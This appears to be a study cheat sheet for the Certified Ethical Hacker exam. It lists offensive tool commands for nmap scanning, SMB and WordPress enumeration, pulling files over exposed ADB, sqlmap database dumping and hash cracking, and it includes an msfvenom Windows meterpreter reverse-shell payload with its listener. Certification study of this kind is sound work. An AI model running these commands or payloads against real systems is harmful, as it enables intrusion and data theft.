CEH

Are you ready to take on the challenge of the Certified Ethical Hacker (CEH) certification? This comprehensive cheat sheet covers all the essential concepts, tools, and techniques you need to ace the exam. Dive into key topics like network security, hacking techniques, penetration testing, and incident response. Master the art of ethical hacking and elevate your cybersecurity career with this ultimate study guide.


CEH Practical Exam Time Management:

  • Total Time: 360 minutes (6 hours)
  • Total Questions: 20
  • Time per Question: 18 minutes
  • Time Limit per Question: 10 minutes (if stuck, skip and return later)

Steganography Tools:

This section covers steganography tools for covert communication: SNOW for text-based steganography, OpenStego for image-based steganography, and Covert_TCP for network-based steganography. Knowing how each tool hides data is what lets you recognise a covert channel when you meet one.

  • SNOW (Windows)
    • Hide and extract data from text files
      • Encrypt: SNOW.EXE -C -m "<message>" -p "<password>" <source file.txt> <destination file.txt>
      • Decrypt: SNOW.EXE -C -p "<password>" <source file.txt>
  • OpenStego (GUI)
    • Hide and extract data from image files.
  • Covert_TCP (hiding data in TCP/IP headers)
    • Attacker:
      • Create and transfer a secret message.
      • Compile and use covert_tcp.c.
    • Target:
      • Capture packets using tcpdump and transfer covert_tcp.c.
      • Compile and use the covert TCP program to receive the hidden message.
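As an added detection example (not part of the original cheat sheet): SNOW hides its bits as runs of spaces and tabs appended after the visible text of each line, so a defender can flag text files whose lines end in mixed space/tab runs. The sample texts are constructed and the 50% threshold is an assumption.

```python
import re
from typing import List, Tuple

# Constructed samples. SUSPECT_TEXT mimics the trait SNOW leaves behind
# (mixed space/tab runs after the visible text); the exact SNOW bit
# encoding is not reproduced here.
CLEAN_TEXT = "roses are red\nviolets are blue\nthis file is clean\n"
SUSPECT_TEXT = (
    "roses are red \t \t\t \n"
    "violets are blue\t  \t \t\n"
    "this file is not clean \t\t  \t\n"
)

TRAILING_WS = re.compile(r"[ \t]+$")


def trailing_runs(text: str) -> List[Tuple[str, str]]:
    """Return (visible_text, trailing space/tab run) for every line."""
    result = []
    for line in text.splitlines():
        m = TRAILING_WS.search(line)
        run = m.group(0) if m else ""
        result.append((line[: len(line) - len(run)], run))
    return result


def whitespace_steg_score(text: str) -> Tuple[float, int]:
    """Fraction of non-blank lines whose trailing run mixes spaces and
    tabs, plus the total count of trailing whitespace characters.
    Editors leave the odd trailing space; mixed runs on most lines are
    the signature worth investigating."""
    lines = [(v, r) for v, r in trailing_runs(text) if v.strip()]
    if not lines:
        return 0.0, 0
    mixed = sum(1 for _, r in lines if " " in r and "\t" in r)
    hidden = sum(len(r) for _, r in lines)
    return mixed / len(lines), hidden


def is_suspicious(text: str, threshold: float = 0.5) -> bool:
    """Assumed threshold: half or more of the lines carry mixed runs."""
    score, hidden = whitespace_steg_score(text)
    return hidden > 0 and score >= threshold


if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_TEXT), ("suspect", SUSPECT_TEXT)):
        print(name, whitespace_steg_score(sample), is_suspicious(sample))
```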

Hashing & Encryption Tools

HashMyFiles is a Windows tool for calculating and comparing hashes of files. Cryptool allows you to encrypt and decrypt hex data by manipulating key lengths. BcTextEncoder enables encoding and decoding text in files. CryptoForge is a versatile tool for file encryption and decryption. VeraCrypt is a powerful tool for hiding and encrypting entire disk partitions.

  • HashMyFiles (Windows): Calculate and compare hashes of files.
  • Cryptool: Encrypt/decrypt hex data by manipulating key lengths.
  • BcTextEncoder: Encode/decode text in files (.hex).
  • CryptoForge: Encrypt and decrypt files.
  • VeraCrypt: Hide and encrypt disk partitions

Remote Access Trojans (RAT)

Remote Access Trojans (RATs) are malicious software that grants unauthorized remote access to a victim’s system. Popular RATs like njRAT, MoSucker, ProRat, Theef, and HTTP RAT offer various functionalities, including keylogging, file transfer, and remote control. These tools often require the victim’s IP address to establish a connection, making them less versatile than other RATs that can operate without this information. Understanding the capabilities of these tools is crucial for cybersecurity professionals to detect and mitigate potential threats.

  • njRAT: Reverse shell.
  • MoSucker
  • ProRat: Requires victim’s IP.
  • Theef: Requires victim’s IP.
  • HTTP RAT: Requires victim’s IP.

Network Scanning with Nmap

Nmap, a powerful network scanning tool, is essential for network security assessments. It allows you to discover hosts on a network, identify open ports, and gather information about running services. By understanding the vulnerabilities associated with these services, you can take steps to protect your network and systems. Nmap offers a wide range of scanning techniques, including port scanning, OS detection, service version detection, and vulnerability scanning.

  • Basic Scans
    • nmap -sn -PR [IP]: ARP ping scan.
    • nmap -sn -PU [IP]: UDP ping scan.
    • nmap -sT -v [IP]: TCP connect/full open scan.
    • nmap -sS -v [IP]: Stealth/TCP SYN scan.
  • Service Version Detection
    • nmap -sV -v [IP]: Detect service versions.
    • nmap -A -v [IP]: Aggressive scan.
  • OS Discovery
    • nmap -O -v [IP]: OS detection.
    • nmap --script smb-os-discovery.nse [IP]: SMB OS discovery.

Vulnerability Scanning

Vulnerability scanning involves identifying and assessing potential weaknesses in systems and networks. Tools like Nmap can be used for various scanning techniques. SNMP enumeration can reveal network device information by exploiting the Simple Network Management Protocol. NBTStat enumeration is useful for gathering information about Windows systems on a network. Vulnerability scripts, such as those provided by Nmap, can automate the process of identifying vulnerabilities in target systems. By leveraging these tools and techniques, security professionals can proactively address potential security risks and protect their organizations from cyberattacks.

  • SNMP Enumeration:
    • nmap -sU -p 161 [IP]
    • snmp-check [IP]
  • NBTStat Enumeration (Windows):
    • nbtstat -a [IP]
    • nbtstat -c
  • Vulnerability Scripts:
    • nmap -sV -p [port] --script vulners [IP]

Wireshark

Wireshark is a powerful network protocol analyzer that allows you to capture and inspect network traffic. By applying filters like http.request.method==POST/GET or ip.addr==<ip>, you can focus on specific types of traffic. For IoT security, Wireshark can be used to analyze MQTT traffic to identify vulnerabilities and potential attacks. Additionally, Wireshark supports remote capture, enabling you to capture network traffic on remote devices, even after logging off.

  • Filters:
    • http.request.method == "POST" or http.request.method == "GET"
    • ip.addr == <ip>
    • mqtt (for IoT traffic).
  • Remote Capture:
    • Start remote packet capture and log off the target

Hacking Mobile with ADB

This blog post explores techniques for potentially compromising mobile devices using ADB (Android Debug Bridge). We’ll analyze the usage of common ADB commands like adb connect and adb pull, potentially used for unauthorized data extraction. Additionally, we’ll examine tools like “Phonesploit” (hypothetical example), highlighting the importance of understanding potential vulnerabilities and taking necessary precautions to secure your mobile devices.

  • ADB Commands:
    • sudo nmap -p 5555 <ip>
    • adb connect <ip>:5555
    • adb pull /sdcard/scan/
  • Phonesploit:
    • python3 phonesploit.py

SMB and Web Enumeration:

SMB and Web Enumeration are powerful techniques used to gather information about a target system. SMB enumeration involves using tools like smbclient and nmap to identify shares, users, and other sensitive information on SMB-enabled systems. Web enumeration techniques, such as using wpscan for WordPress sites and gobuster for directory discovery, can reveal vulnerabilities and potential attack vectors. By understanding and employing these techniques responsibly, security professionals can assess the security posture of systems and networks.

  • SMB Enumeration:
    • smbclient -L [IP]
    • nmap -p 445 -sV --script smb-enum-services [IP]
  • WordPress Enumeration:
    • wpscan --url <URL> --passwords=<wordlist>
  • Web Directory Enumeration:
    • gobuster dir -u <ip> -w <wordlist> -t 50 -x php,html,txt

SQL Injection:

SQL injection is a type of cyberattack where malicious code is inserted into SQL statements to manipulate databases. Tools like SQLMap can be used to automate these attacks. By using techniques like database fingerprinting, table enumeration, column extraction, and data dumping, attackers can gain unauthorized access to sensitive information.

  • SQLMap Usage:
    • sqlmap -u <URL> --forms --dump
    • Extract databases: sqlmap -u <URL> --dbs
    • Extract columns: sqlmap -u <URL> -D <database> -T <table> --columns

Steganography:

Steganography involves concealing messages within other media to evade detection. Tools like Steghide enable hiding data within images, while ExifTool, Zsteg, and Binwalk can be used to analyze image metadata for potential hidden information. Covert_TCP allows for covert communication by hiding data within TCP/IP headers.

  • Steghide:
    • Hide data: steghide embed -cf <image> -ef <file>
    • Extract data: steghide extract -sf <image>
  • ExifTool, Zsteg, Binwalk: for image metadata extraction.

Hash Cracking:

Hashcat and John the Ripper are powerful tools for cracking hashes, which are cryptographic representations of data. Hashcat offers a wide range of algorithms and supports various hardware acceleration techniques, while John the Ripper is known for its versatility and efficiency. These tools are essential for cybersecurity professionals and researchers to test the strength of password hashing algorithms and identify potential vulnerabilities.

  • Hashcat:
    • hashcat -m 0 <hash> <wordlist> --show
  • John the Ripper:
    • john --format=Raw-MD5 --wordlist=<wordlist> <hash>

Miscellaneous Tools

This section delves into various tools used for network security assessments and penetration testing. Nikto is a powerful vulnerability scanner that can identify potential security risks in web servers. Netdiscover is a network discovery tool used to identify active hosts on a network. Responder is a tool for capturing NTLM hashes, which can be used for password cracking. Metasploit is a comprehensive penetration testing framework that allows you to generate payloads, exploit vulnerabilities, and execute attacks.

  • Nikto: Vulnerability scanning.
  • Netdiscover: Network discovery.
  • Responder: Capturing NTLM hashes.
  • Metasploit:
    • Payload generation: msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=my.ip LPORT=my.port -o /root/Desktop/test.exe
      • -p = payload
      • --platform = OS
      • -a = architecture
      • -f = format of the payload
      • -o = output file path
    • Start reverse shell handler: use exploit/multi/handler
